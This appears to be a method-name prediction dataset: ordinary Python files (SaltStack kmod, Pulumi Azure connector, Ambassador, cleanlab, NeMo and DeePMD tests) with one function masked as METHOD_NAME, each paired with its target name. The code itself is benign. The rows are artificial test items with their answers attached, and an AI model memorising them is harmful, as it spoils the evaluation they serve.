def _new_mods(pre_mods, post_mods):
"""
Return a list of the new modules, pass an kldstat dict before running
modprobe and one after modprobe has run
"""
pre = set()
post = set()
for mod in pre_mods:
pre.add(mod["module"])
for mod in post_mods:
post.add(mod["module"])
return post - pre
def _rm_mods(pre_mods, post_mods):
"""
Return a list of the new modules, pass an kldstat dict before running
modprobe and one after modprobe has run
"""
pre = set()
post = set()
for mod in pre_mods:
pre.add(mod["module"])
for mod in post_mods:
post.add(mod["module"])
return pre - post
def _get_module_name(line):
match = re.search(_MODULES_RE, line)
if match:
return match.group(1)
return None
def _get_persistent_modules():
"""
Returns a list of modules in loader.conf that load on boot.
"""
mods = set()
with salt.utils.files.fopen(_LOADER_CONF, "r") as loader_conf:
for line in loader_conf:
line = salt.utils.stringutils.to_unicode(line)
line = line.strip()
mod_name = _get_module_name(line)
if mod_name:
mods.add(mod_name)
return mods
def _set_persistent_module(mod):
"""
Add a module to loader.conf to make it persistent.
"""
if not mod or mod in mod_list(True) or mod not in METHOD_NAME():
return set()
__salt__["file.append"](_LOADER_CONF, _LOAD_MODULE.format(mod))
return {mod}
def _remove_persistent_module(mod, comment):
"""
Remove module from loader.conf. If comment is true only comment line where
module is.
"""
if not mod or mod not in mod_list(True):
return set()
if comment:
__salt__["file.comment"](_LOADER_CONF, _MODULE_RE.format(mod))
else:
__salt__["file.sed"](_LOADER_CONF, _MODULE_RE.format(mod), "")
return {mod}
def METHOD_NAME():
"""
Return a list of all available kernel modules
CLI Example:
.. code-block:: bash
salt '*' kmod.available
"""
ret = []
for path in __salt__["file.find"]("/boot/kernel", name="*.ko$"):
bpath = os.path.basename(path)
comps = bpath.split(".")
if "ko" in comps:
# This is a kernel module, return it without the .ko extension
ret.append(".".join(comps[: comps.index("ko")]))
return ret
def check_available(mod):
"""
Check to see if the specified kernel module is available
CLI Example:
.. code-block:: bash
salt '*' kmod.check_available vmm
"""
return mod in METHOD_NAME()
def lsmod():
"""
Return a dict containing information about currently loaded modules
CLI Example:
.. code-block:: bash
salt '*' kmod.lsmod
"""
ret = []
for line in __salt__["cmd.run"]("kldstat").splitlines():
comps = line.split()
if not len(comps) > 2:
continue
if comps[0] == "Id":
continue
if comps[4] == "kernel":
continue
ret.append({"module": comps[4][:-3], "size": comps[3], "depcount": comps[1]})
return ret
def mod_list(only_persist=False):
"""
Return a list of the loaded module names
CLI Example:
.. code-block:: bash
salt '*' kmod.mod_list
"""
mods = set()
if only_persist:
if not _get_persistent_modules():
return mods
for mod in _get_persistent_modules():
mods.add(mod)
else:
for mod in lsmod():
mods.add(mod["module"])
return sorted(list(mods))
def load(mod, persist=False):
"""
Load the specified kernel module
mod
Name of the module to add
persist
Write the module to sysrc kld_modules to make it load on system reboot
CLI Example:
.. code-block:: bash
salt '*' kmod.load bhyve
"""
pre_mods = lsmod()
response = __salt__["cmd.run_all"]("kldload {}".format(mod), python_shell=False)
if response["retcode"] == 0:
post_mods = lsmod()
mods = _new_mods(pre_mods, post_mods)
persist_mods = set()
if persist:
persist_mods = _set_persistent_module(mod)
return sorted(list(mods | persist_mods))
elif "module already loaded or in kernel" in response["stderr"]:
if persist and mod not in _get_persistent_modules():
persist_mods = _set_persistent_module(mod)
return sorted(list(persist_mods))
else:
# It's compiled into the kernel
return [None]
else:
return "Module {} not found".format(mod)
def is_loaded(mod):
"""
Check to see if the specified kernel module is loaded
CLI Example:
.. code-block:: bash
salt '*' kmod.is_loaded vmm
"""
return mod in mod_list()
def remove(mod, persist=False, comment=True):
"""
Remove the specified kernel module
mod
Name of module to remove
persist
Also remove module from /boot/loader.conf
comment
If persist is set don't remove line from /boot/loader.conf but only
comment it
CLI Example:
.. code-block:: bash
salt '*' kmod.remove vmm
"""
pre_mods = lsmod()
res = __salt__["cmd.run_all"]("kldunload {}".format(mod), python_shell=False)
if res["retcode"] == 0:
post_mods = lsmod()
mods = _rm_mods(pre_mods, post_mods)
persist_mods = set()
if persist:
persist_mods = _remove_persistent_module(mod, comment)
return sorted(list(mods | persist_mods))
else:
return "Error removing module {}: {}".format(mod, res["stderr"]) |
298,437 | get aws cloud trail data connector output | # coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetAwsCloudTrailDataConnectorResult',
'AwaitableGetAwsCloudTrailDataConnectorResult',
'get_aws_cloud_trail_data_connector',
'get_aws_cloud_trail_data_connector_output',
]
@pulumi.output_type
class GetAwsCloudTrailDataConnectorResult:
"""
Represents Amazon Web Services CloudTrail data connector.
"""
def __init__(__self__, aws_role_arn=None, data_types=None, etag=None, id=None, kind=None, name=None, system_data=None, type=None):
if aws_role_arn and not isinstance(aws_role_arn, str):
raise TypeError("Expected argument 'aws_role_arn' to be a str")
pulumi.set(__self__, "aws_role_arn", aws_role_arn)
if data_types and not isinstance(data_types, dict):
raise TypeError("Expected argument 'data_types' to be a dict")
pulumi.set(__self__, "data_types", data_types)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if system_data and not isinstance(system_data, dict):
raise TypeError("Expected argument 'system_data' to be a dict")
pulumi.set(__self__, "system_data", system_data)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="awsRoleArn")
def aws_role_arn(self) -> Optional[str]:
"""
The Aws Role Arn (with CloudTrailReadOnly policy) that is used to access the Aws account.
"""
return pulumi.get(self, "aws_role_arn")
@property
@pulumi.getter(name="dataTypes")
def data_types(self) -> 'outputs.AwsCloudTrailDataConnectorDataTypesResponse':
"""
The available data types for the connector.
"""
return pulumi.get(self, "data_types")
@property
@pulumi.getter
def etag(self) -> Optional[str]:
"""
Etag of the azure resource
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def id(self) -> str:
"""
Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def kind(self) -> str:
"""
The kind of the data connector
Expected value is 'AmazonWebServicesCloudTrail'.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> 'outputs.SystemDataResponse':
"""
Azure Resource Manager metadata containing createdBy and modifiedBy information.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
class AwaitableGetAwsCloudTrailDataConnectorResult(GetAwsCloudTrailDataConnectorResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetAwsCloudTrailDataConnectorResult(
aws_role_arn=self.aws_role_arn,
data_types=self.data_types,
etag=self.etag,
id=self.id,
kind=self.kind,
name=self.name,
system_data=self.system_data,
type=self.type)
def get_aws_cloud_trail_data_connector(data_connector_id: Optional[str] = None,
resource_group_name: Optional[str] = None,
workspace_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetAwsCloudTrailDataConnectorResult:
"""
Gets a data connector.
:param str data_connector_id: Connector ID
:param str resource_group_name: The name of the resource group. The name is case insensitive.
:param str workspace_name: The name of the workspace.
"""
__args__ = dict()
__args__['dataConnectorId'] = data_connector_id
__args__['resourceGroupName'] = resource_group_name
__args__['workspaceName'] = workspace_name
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('azure-native:securityinsights/v20230601preview:getAwsCloudTrailDataConnector', __args__, opts=opts, typ=GetAwsCloudTrailDataConnectorResult).value
return AwaitableGetAwsCloudTrailDataConnectorResult(
aws_role_arn=pulumi.get(__ret__, 'aws_role_arn'),
data_types=pulumi.get(__ret__, 'data_types'),
etag=pulumi.get(__ret__, 'etag'),
id=pulumi.get(__ret__, 'id'),
kind=pulumi.get(__ret__, 'kind'),
name=pulumi.get(__ret__, 'name'),
system_data=pulumi.get(__ret__, 'system_data'),
type=pulumi.get(__ret__, 'type'))
@_utilities.lift_output_func(get_aws_cloud_trail_data_connector)
def METHOD_NAME(data_connector_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetAwsCloudTrailDataConnectorResult]:
"""
Gets a data connector.
:param str data_connector_id: Connector ID
:param str resource_group_name: The name of the resource group. The name is case insensitive.
:param str workspace_name: The name of the workspace.
"""
... |
298,438 | test tracing cluster fields | import logging
from pathlib import Path
from typing import TYPE_CHECKING, Optional
import pytest
from tests.selfsigned import TLSCerts
from tests.utils import (
assert_valid_envoy_config,
econf_foreach_cluster,
module_and_mapping_manifests,
)
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s test %(levelname)s: %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
logger = logging.getLogger("ambassador")
from ambassador import IR, Config, EnvoyConfig
from ambassador.fetch import ResourceFetcher
from ambassador.utils import NullSecretHandler, SecretHandler, SecretInfo
from tests.utils import default_listener_manifests
if TYPE_CHECKING:
from ambassador.ir.irresource import IRResource # pragma: no cover
class MockSecretHandler(SecretHandler):
def load_secret(
self, resource: "IRResource", secret_name: str, namespace: str
) -> Optional[SecretInfo]:
return SecretInfo(
"fallback-self-signed-cert",
"ambassador",
"mocked-fallback-secret",
TLSCerts["acook"].pubcert,
TLSCerts["acook"].privkey,
decode_b64=False,
)
def _get_envoy_config(yaml):
aconf = Config()
fetcher = ResourceFetcher(logger, aconf)
fetcher.parse_yaml(default_listener_manifests() + yaml, k8s=True)
aconf.load_all(fetcher.sorted())
secret_handler = NullSecretHandler(logger, None, None, "0")
ir = IR(aconf, file_checker=lambda path: True, secret_handler=secret_handler)
assert ir
return EnvoyConfig.generate(ir)
@pytest.mark.compilertest
def test_tracing_config_v3(tmp_path: Path):
aconf = Config()
yaml = (
module_and_mapping_manifests(None, [])
+ "\n"
+ """
---
apiVersion: getambassador.io/v3alpha1
kind: TracingService
metadata:
name: myts
namespace: default
spec:
service: zipkin-test:9411
driver: zipkin
custom_tags:
- tag: ltag
literal:
value: avalue
- tag: etag
environment:
name: UNKNOWN_ENV_VAR
default_value: efallback
- tag: htag
request_header:
name: x-does-not-exist
default_value: hfallback
"""
)
fetcher = ResourceFetcher(logger, aconf)
fetcher.parse_yaml(yaml, k8s=True)
aconf.load_all(fetcher.sorted())
secret_handler = MockSecretHandler(
logger, "mockery", str(tmp_path / "ambassador" / "snapshots"), "v1"
)
ir = IR(aconf, file_checker=lambda path: True, secret_handler=secret_handler)
assert ir
econf = EnvoyConfig.generate(ir)
# check if custom_tags are added
assert econf.as_dict()["static_resources"]["listeners"][0]["filter_chains"][0]["filters"][0][
"typed_config"
]["tracing"] == {
"custom_tags": [
{"literal": {"value": "avalue"}, "tag": "ltag"},
{
"environment": {"default_value": "efallback", "name": "UNKNOWN_ENV_VAR"},
"tag": "etag",
},
{
"request_header": {"default_value": "hfallback", "name": "x-does-not-exist"},
"tag": "htag",
},
]
}
bootstrap_config, ads_config, _ = econf.split_config()
assert "tracing" in bootstrap_config
assert bootstrap_config["tracing"] == {
"http": {
"name": "envoy.zipkin",
"typed_config": {
"@type": "type.googleapis.com/envoy.config.trace.v3.ZipkinConfig",
"collector_endpoint": "/api/v2/spans",
"collector_endpoint_version": "HTTP_JSON",
"trace_id_128bit": True,
"collector_cluster": "cluster_tracing_zipkin_test_9411_default",
},
}
}
ads_config.pop("@type", None)
assert_valid_envoy_config(ads_config, extra_dirs=[str(tmp_path / "ambassador" / "snapshots")])
assert_valid_envoy_config(
bootstrap_config, extra_dirs=[str(tmp_path / "ambassador" / "snapshots")]
)
@pytest.mark.compilertest
def test_tracing_zipkin_defaults():
yaml = """
---
apiVersion: getambassador.io/v3alpha1
kind: TracingService
metadata:
name: myts
namespace: default
spec:
service: zipkin-test:9411
driver: zipkin
"""
econf = _get_envoy_config(yaml)
bootstrap_config, _, _ = econf.split_config()
assert "tracing" in bootstrap_config
assert bootstrap_config["tracing"] == {
"http": {
"name": "envoy.zipkin",
"typed_config": {
"@type": "type.googleapis.com/envoy.config.trace.v3.ZipkinConfig",
"collector_endpoint": "/api/v2/spans",
"collector_endpoint_version": "HTTP_JSON",
"trace_id_128bit": True,
"collector_cluster": "cluster_tracing_zipkin_test_9411_default",
},
}
}
@pytest.mark.compilertest
def METHOD_NAME():
yaml = """
---
apiVersion: getambassador.io/v3alpha1
kind: TracingService
metadata:
name: myts
namespace: default
spec:
service: zipkin-test:9411
driver: zipkin
stats_name: tracingservice
"""
econf = _get_envoy_config(yaml)
bootstrap_config, _, _ = econf.split_config()
assert "tracing" in bootstrap_config
cluster_name = "cluster_tracing_zipkin_test_9411_default"
assert bootstrap_config["tracing"] == {
"http": {
"name": "envoy.zipkin",
"typed_config": {
"@type": "type.googleapis.com/envoy.config.trace.v3.ZipkinConfig",
"collector_endpoint": "/api/v2/spans",
"collector_endpoint_version": "HTTP_JSON",
"trace_id_128bit": True,
"collector_cluster": cluster_name,
},
}
}
def check_fields(cluster):
assert cluster["alt_stat_name"] == "tracingservice"
econf_foreach_cluster(econf.as_dict(), check_fields, name=cluster_name)
@pytest.mark.compilertest
def test_tracing_zipkin_invalid_collector_version():
"""test to ensure that providing an improper value will result in an error and the tracer not included"""
yaml = """
---
apiVersion: getambassador.io/v3alpha1
kind: TracingService
metadata:
name: myts
namespace: default
spec:
service: zipkin-test:9411
driver: zipkin
config:
collector_endpoint_version: "HTTP_JSON_V1"
"""
econf = _get_envoy_config(yaml)
bootstrap_config, _, _ = econf.split_config()
assert "tracing" not in bootstrap_config
@pytest.mark.compilertest
def test_lightstep_not_supported(tmp_path: Path):
yaml = """
---
apiVersion: getambassador.io/v3alpha1
kind: TracingService
metadata:
name: tracing
namespace: ambassador
spec:
service: lightstep:80
driver: lightstep
custom_tags:
- tag: ltag
literal:
value: avalue
- tag: etag
environment:
name: UNKNOWN_ENV_VAR
default_value: efallback
- tag: htag
request_header:
name: x-does-not-exist
default_value: hfallback
config:
access_token_file: /lightstep-credentials/access-token
propagation_modes: ["ENVOY", "TRACE_CONTEXT"]
"""
econf = _get_envoy_config(yaml)
assert "ir.tracing" in econf.ir.aconf.errors
tracing_error = econf.ir.aconf.errors["ir.tracing"][0]["error"]
assert "'lightstep' driver is no longer supported" in tracing_error
bootstrap_config, _, _ = econf.split_config()
assert "tracing" not in bootstrap_config |
298,439 | pred probs | import numpy as np
import pandas as pd
import pytest
from datasets import load_dataset
from datasets.arrow_dataset import Dataset
from PIL import Image
from sklearn.neighbors import NearestNeighbors
from cleanlab.datalab.datalab import Datalab
SEED = 42
LABEL_NAME = "star"
@pytest.fixture
def dataset():
data_dict = {
"id": [
"7bd227d9-afc9-11e6-aba1-c4b301cdf627",
"7bd22905-afc9-11e6-a5dc-c4b301cdf627",
"7bd2299c-afc9-11e6-85d6-c4b301cdf627",
"7bd22a26-afc9-11e6-9309-c4b301cdf627",
"7bd22aba-afc9-11e6-8293-c4b301cdf627",
],
"package_name": [
"com.mantz_it.rfanalyzer",
"com.mantz_it.rfanalyzer",
"com.mantz_it.rfanalyzer",
"com.mantz_it.rfanalyzer",
"com.mantz_it.rfanalyzer",
],
"review": [
"Great app! The new version now works on my Bravia Android TV which is great as it's right by my rooftop aerial cable. The scan feature would be useful...any ETA on when this will be available? Also the option to import a list of bookmarks e.g. from a simple properties file would be useful.",
"Great It's not fully optimised and has some issues with crashing but still a nice app especially considering the price and it's open source.",
"Works on a Nexus 6p I'm still messing around with my hackrf but it works with my Nexus 6p Trond usb-c to usb host adapter. Thanks!",
"The bandwidth seemed to be limited to maximum 2 MHz or so. I tried to increase the bandwidth but not possible. I purchased this is because one of the pictures in the advertisement showed the 2.4GHz band with around 10MHz or more bandwidth. Is it not possible to increase the bandwidth? If not it is just the same performance as other free APPs.",
"Works well with my Hackrf Hopefully new updates will arrive for extra functions",
],
"date": [
"October 12 2016",
"August 23 2016",
"August 04 2016",
"July 25 2016",
"July 22 2016",
],
"star": [4, 4, 5, 3, 5],
"version_id": [1487, 1487, 1487, 1487, 1487],
}
return Dataset.from_dict(data_dict)
@pytest.fixture
def label_name():
return LABEL_NAME
@pytest.fixture
def lab(dataset, label_name):
return Datalab(data=dataset, label_name=label_name)
@pytest.fixture
def large_lab():
np.random.seed(SEED)
N = 100
K = 2
data = np.random.rand(N, 2)
labels = np.random.randint(0, K, size=N)
METHOD_NAME = np.random.rand(N, K)
METHOD_NAME /= METHOD_NAME.sum(axis=1, keepdims=True)
lab = Datalab(
data={"features": data, "label": labels, "pred_probs": METHOD_NAME}, label_name="label"
)
knn = NearestNeighbors(n_neighbors=25, metric="euclidean").fit(data)
knn_graph = knn.kneighbors_graph(mode="distance")
lab.info["statistics"]["unit_test_knn_graph"] = knn_graph
return lab
@pytest.fixture
def METHOD_NAME(dataset):
np.random.seed(SEED)
return np.random.rand(len(dataset), 3)
@pytest.fixture
def custom_issue_manager():
from cleanlab.datalab.internal.issue_manager.issue_manager import IssueManager
class CustomIssueManager(IssueManager):
issue_name = "custom_issue"
def find_issues(self, custom_argument: int = 1, **_) -> None:
# Flag example as an issue if the custom argument equals its index
scores = [
abs(i - custom_argument) / (i + custom_argument)
for i in range(len(self.datalab.data))
]
self.issues = pd.DataFrame(
{
f"is_{self.issue_name}_issue": [
i == custom_argument for i in range(len(self.datalab.data))
],
self.issue_score_key: scores,
},
)
summary_score = np.mean(scores)
self.summary = self.make_summary(score=summary_score)
return CustomIssueManager
def generate_image():
arr = np.random.randint(low=0, high=256, size=(300, 300, 3), dtype=np.uint8)
img = Image.fromarray(arr, mode="RGB")
return img
@pytest.fixture
def image_dataset():
data_path = "./tests/datalab/data"
dataset = load_dataset(
"imagefolder",
data_dir=data_path,
split="train",
)
return dataset |
298,440 | test tabular tokenizer | # Copyright (c) 2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import string
import numpy as np
import pytest
from nemo.collections.common.tokenizers.column_coder import ColumnCodes
from nemo.collections.common.tokenizers.tabular_tokenizer import TabularTokenizer
class TestTabularTokenizer:
def setup_method(self, test_method):
column_configs = [
{
"name": "col_a",
"code_type": "float",
"args": {"code_len": 4, "base": 16, "fillall": False, "hasnan": True, "transform": 'yeo-johnson'},
},
{
"name": "col_b",
"code_type": "float",
"args": {"code_len": 4, "base": 177, "fillall": True, "hasnan": True, "transform": 'quantile'},
},
{
"name": "col_c",
"code_type": "int",
"args": {"code_len": 3, "base": 12, "fillall": True, "hasnan": True},
},
{"name": "col_d", "code_type": "category",},
]
example_arrays = {}
np.random.seed(1234)
array = np.random.random(100)
example_arrays['col_a'] = array
array = np.random.random(100)
example_arrays['col_b'] = array
array = np.random.randint(3, 1000, 100)
example_arrays['col_c'] = array
ALPHABET = np.array(list(string.ascii_lowercase + ' '))
array = np.char.add(np.random.choice(ALPHABET, 1000), np.random.choice(ALPHABET, 1000))
example_arrays['col_d'] = array
self.cc = ColumnCodes.get_column_codes(column_configs, example_arrays)
@pytest.mark.unit
def METHOD_NAME(self):
tab = TabularTokenizer(self.cc, delimiter=',')
text = "0.323, 0.1, 232, xy\n0.323, 0.1, 232, xy<|endoftext|>"
r = tab.text_to_tokens(text)
assert len(r) == 10
assert tab.eod == 1351
assert tab.eor == 1352
assert tab.num_columns == 4
assert self.cc.vocab_size == 1351
assert tab.vocab_size == 1353
r = tab.text_to_ids(text)
assert (sum(self.cc.sizes) + 1) * 2 == len(r)
assert np.array_equal(
np.array(r[0:13]), np.array([49, 32, 29, 15, 584, 417, 305, 76, 787, 780, 773, 1313, 1352])
)
assert np.array_equal(
np.array(r[13:]), np.array([49, 32, 29, 15, 584, 417, 305, 76, 787, 780, 773, 1313, 1351])
)
reversed_text = tab.ids_to_text(r)
assert reversed_text == '0.3230,0.0999998,232,xy\n0.3230,0.0999998,232,xy<|endoftext|>'
text = "xy\n0.323, 0.1, 232, xy<|endoftext|>"
r = tab.text_to_tokens(text)
assert len(r) == 7
r = tab.text_to_ids(text)
assert sum(self.cc.sizes) + 1 + 2 == len(r)
assert np.array_equal(np.array(r[0:2]), np.array([1313, 1352]))
assert np.array_equal(
np.array(r[2:15]), np.array([49, 32, 29, 15, 584, 417, 305, 76, 787, 780, 773, 1313, 1351])
)
reversed_text = tab.ids_to_text(r)
assert reversed_text == 'xy\n0.3230,0.0999998,232,xy<|endoftext|>'
text = "\n0.323, 0.1, 232, xy<|endoftext|>"
r = tab.text_to_tokens(text)
assert len(r) == 5
r = tab.text_to_ids(text)
assert sum(self.cc.sizes) + 1 == len(r)
assert np.array_equal(
np.array(r[0:13]), np.array([49, 32, 29, 15, 584, 417, 305, 76, 787, 780, 773, 1313, 1351])
)
reversed_text = tab.ids_to_text(r)
assert reversed_text == '0.3230,0.0999998,232,xy<|endoftext|>'
text = "232, xy\n0.323, 0.1, 232, xy<|endoftext|>"
r = tab.text_to_tokens(text)
assert len(r) == 8
r = tab.text_to_ids(text)
assert sum(self.cc.sizes) + 1 + 5 == len(r)
assert np.array_equal(np.array(r[0:5]), np.array([787, 780, 773, 1313, 1352]))
assert np.array_equal(
np.array(r[5:18]), np.array([49, 32, 29, 15, 584, 417, 305, 76, 787, 780, 773, 1313, 1351])
)
reversed_text = tab.ids_to_text(r)
assert reversed_text == '232,xy\n0.3230,0.0999998,232,xy<|endoftext|>'
text = "0.1, 232, xy\n0.323, 0.1, 232, xy<|endoftext|>"
r = tab.text_to_tokens(text)
assert len(r) == 9
r = tab.text_to_ids(text)
assert sum(self.cc.sizes) + 1 + 9 == len(r)
assert np.array_equal(np.array(r[0:9]), np.array([584, 417, 305, 76, 787, 780, 773, 1313, 1352]))
assert np.array_equal(
np.array(r[9:22]), np.array([49, 32, 29, 15, 584, 417, 305, 76, 787, 780, 773, 1313, 1351])
)
reversed_text = tab.ids_to_text(r)
assert reversed_text == '0.0999998,232,xy\n0.3230,0.0999998,232,xy<|endoftext|>' |
298,441 | subprocess run | # SPDX-License-Identifier: LGPL-3.0-or-later
import json
import os
import subprocess as sp
import unittest
import numpy as np
# from deepmd.entrypoints.compress import compress
from common import (
j_loader,
run_dp,
tests_path,
)
from deepmd.env import (
GLOBAL_NP_FLOAT_PRECISION,
)
from deepmd.infer import (
DeepPot,
)
if GLOBAL_NP_FLOAT_PRECISION == np.float32:
default_places = 4
else:
default_places = 10
def _file_delete(file):
if os.path.isdir(file):
os.rmdir(file)
elif os.path.isfile(file):
os.remove(file)
def METHOD_NAME(command):
popen = sp.Popen(command.split(), shell=False, stdout=sp.PIPE, stderr=sp.STDOUT)
for line in iter(popen.stdout.readline, b""):
if hasattr(line, "decode"):
line = line.decode("utf-8")
line = line.rstrip()
print(line)
popen.wait()
return popen.returncode
def _init_models():
data_file = str(tests_path / os.path.join("model_compression", "data"))
frozen_model = str(tests_path / "dp-original-type-one-side-exclude-types.pb")
compressed_model = str(tests_path / "dp-compressed-type-one-side-exclude-types.pb")
INPUT = str(tests_path / "input.json")
jdata = j_loader(str(tests_path / os.path.join("model_compression", "input.json")))
jdata["training"]["training_data"]["systems"] = data_file
jdata["training"]["validation_data"]["systems"] = data_file
jdata["model"]["descriptor"]["type_one_side"] = True
jdata["model"]["descriptor"]["exclude_types"] = [[0, 0]]
with open(INPUT, "w") as fp:
json.dump(jdata, fp, indent=4)
ret = run_dp("dp train " + INPUT)
np.testing.assert_equal(ret, 0, "DP train failed!")
ret = run_dp("dp freeze -o " + frozen_model)
np.testing.assert_equal(ret, 0, "DP freeze failed!")
ret = run_dp("dp compress " + " -i " + frozen_model + " -o " + compressed_model)
np.testing.assert_equal(ret, 0, "DP model compression failed!")
return INPUT, frozen_model, compressed_model
INPUT, FROZEN_MODEL, COMPRESSED_MODEL = _init_models()
class TestDeepPotAPBCTypeOneSideExcludeTypes(unittest.TestCase):
@classmethod
def setUpClass(self):
self.dp_original = DeepPot(FROZEN_MODEL)
self.dp_compressed = DeepPot(COMPRESSED_MODEL)
self.coords = np.array(
[
12.83,
2.56,
2.18,
12.09,
2.87,
2.74,
00.25,
3.32,
1.68,
3.36,
3.00,
1.81,
3.51,
2.51,
2.60,
4.27,
3.22,
1.56,
]
)
self.atype = [0, 1, 1, 0, 1, 1]
self.box = np.array([13.0, 0.0, 0.0, 0.0, 13.0, 0.0, 0.0, 0.0, 13.0])
def test_attrs(self):
self.assertEqual(self.dp_original.get_ntypes(), 2)
self.assertAlmostEqual(self.dp_original.get_rcut(), 6.0, places=default_places)
self.assertEqual(self.dp_original.get_type_map(), ["O", "H"])
self.assertEqual(self.dp_original.get_dim_fparam(), 0)
self.assertEqual(self.dp_original.get_dim_aparam(), 0)
self.assertEqual(self.dp_compressed.get_ntypes(), 2)
self.assertAlmostEqual(
self.dp_compressed.get_rcut(), 6.0, places=default_places
)
self.assertEqual(self.dp_compressed.get_type_map(), ["O", "H"])
self.assertEqual(self.dp_compressed.get_dim_fparam(), 0)
self.assertEqual(self.dp_compressed.get_dim_aparam(), 0)
def test_1frame(self):
ee0, ff0, vv0 = self.dp_original.eval(
self.coords, self.box, self.atype, atomic=False
)
ee1, ff1, vv1 = self.dp_compressed.eval(
self.coords, self.box, self.atype, atomic=False
)
# check shape of the returns
nframes = 1
natoms = len(self.atype)
self.assertEqual(ee0.shape, (nframes, 1))
self.assertEqual(ff0.shape, (nframes, natoms, 3))
self.assertEqual(vv0.shape, (nframes, 9))
self.assertEqual(ee1.shape, (nframes, 1))
self.assertEqual(ff1.shape, (nframes, natoms, 3))
self.assertEqual(vv1.shape, (nframes, 9))
# check values
np.testing.assert_almost_equal(ff0, ff1, default_places)
np.testing.assert_almost_equal(ee0, ee1, default_places)
np.testing.assert_almost_equal(vv0, vv1, default_places)
def test_1frame_atm(self):
ee0, ff0, vv0, ae0, av0 = self.dp_original.eval(
self.coords, self.box, self.atype, atomic=True
)
ee1, ff1, vv1, ae1, av1 = self.dp_compressed.eval(
self.coords, self.box, self.atype, atomic=True
)
# check shape of the returns
nframes = 1
natoms = len(self.atype)
self.assertEqual(ee0.shape, (nframes, 1))
self.assertEqual(ff0.shape, (nframes, natoms, 3))
self.assertEqual(vv0.shape, (nframes, 9))
self.assertEqual(ae0.shape, (nframes, natoms, 1))
self.assertEqual(av0.shape, (nframes, natoms, 9))
self.assertEqual(ee1.shape, (nframes, 1))
self.assertEqual(ff1.shape, (nframes, natoms, 3))
self.assertEqual(vv1.shape, (nframes, 9))
self.assertEqual(ae1.shape, (nframes, natoms, 1))
self.assertEqual(av1.shape, (nframes, natoms, 9))
# check values
np.testing.assert_almost_equal(ff0, ff1, default_places)
np.testing.assert_almost_equal(ae0, ae1, default_places)
np.testing.assert_almost_equal(av0, av1, default_places)
np.testing.assert_almost_equal(ee0, ee1, default_places)
np.testing.assert_almost_equal(vv0, vv1, default_places)
def test_2frame_atm(self):
coords2 = np.concatenate((self.coords, self.coords))
box2 = np.concatenate((self.box, self.box))
ee0, ff0, vv0, ae0, av0 = self.dp_original.eval(
coords2, box2, self.atype, atomic=True
)
ee1, ff1, vv1, ae1, av1 = self.dp_compressed.eval(
coords2, box2, self.atype, atomic=True
)
# check shape of the returns
nframes = 2
natoms = len(self.atype)
self.assertEqual(ee0.shape, (nframes, 1))
self.assertEqual(ff0.shape, (nframes, natoms, 3))
self.assertEqual(vv0.shape, (nframes, 9))
self.assertEqual(ae0.shape, (nframes, natoms, 1))
self.assertEqual(av0.shape, (nframes, natoms, 9))
self.assertEqual(ee1.shape, (nframes, 1))
self.assertEqual(ff1.shape, (nframes, natoms, 3))
self.assertEqual(vv1.shape, (nframes, 9))
self.assertEqual(ae1.shape, (nframes, natoms, 1))
self.assertEqual(av1.shape, (nframes, natoms, 9))
# check values
np.testing.assert_almost_equal(ff0, ff1, default_places)
np.testing.assert_almost_equal(ae0, ae1, default_places)
np.testing.assert_almost_equal(av0, av1, default_places)
np.testing.assert_almost_equal(ee0, ee1, default_places)
np.testing.assert_almost_equal(vv0, vv1, default_places) |
298,442 | match globs | #! /usr/bin/env python3
"""Minimal macro processor. Used for generating VC++ makefiles.
The available template commands are:
Expand a template section for each file in a list of file patterns::
###MAKTEMPLATE:FOREACH my/path*/*.cxx,other*.cxx
...
###MAKTEMPLATE:ENDFOREACH
In the template section, you can use `###BASENAME###` to get the base name
of the file being processed (e.g. "base" for "../base.cxx"), and you can
use `###FILENAME###` to get the full filename.
Copyright (c) 2000-2022, Bart Samwel and Jeroen T. Vermeulen.
"""
from __future__ import (
absolute_import,
print_function,
unicode_literals,
)
from argparse import (
ArgumentError,
ArgumentParser,
RawDescriptionHelpFormatter,
)
from contextlib import contextmanager
from glob import glob
import os
from sys import (
argv,
stdin,
